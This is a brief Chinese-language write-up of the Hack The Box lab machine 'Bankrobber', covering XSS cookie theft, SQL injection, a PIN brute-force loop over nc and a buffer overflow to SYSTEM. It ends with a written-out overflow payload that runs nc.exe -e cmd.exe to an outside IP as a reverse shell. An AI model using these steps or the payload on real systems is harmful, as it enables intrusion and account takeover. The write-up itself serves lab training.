Hackthebox——Bankrobber

nmap扫描到80、443、445、3306

web上可注册账号，注册后登陆，看到一个TransferE-coin的功能。

随便填了一点信息发送，提示管理员会看这个请求。

抓到这个请求，看到cookie这里是用户名和密码的base64加密，想到通过xss获得管理员的cookie来得到管理员的用户名密码。

构造payload后发包，成功获得管理员cookie，解密后获得管理员密码，成功登陆管理员账号。

登陆管理员账号后，第一个看到note.txt，告诉我们网站的路径。

页面最下面有个backdoorchecker，试试执行命令，提示我们只能在localhost执行。

页面中间有个搜索user的功能，测试后发现存在sql注入。

注入查看到backdoorchecker.php的源码。从源码内容中可知要执行命令只能从本地发送请求，前三个字符必须是dir。

结合之前那个xss的漏洞，构造一个反弹shell的payload，发送后成功反弹sehll，获得user.txt。

尝试了几个提权方法都没成功，后来在C盘根目录下看到一个可疑的程序，并且这个程序正在运行

转发端口到本地，nc连接本地910端口，提示需要4位的PIN码

forn in {0..9}{0..9}{0..9}{0..9};do echo $n;echo $n | nc -nv 127.0.0.1910; done

爆破得到PIN码，连接后测试发现输入e-coins存在溢出

利用溢出成功获得system权限，获得root.txt。

12345678901234567890123456789012C:\Users\Cortin\nc.exe-e cmd.exe 10.10.14.149 4447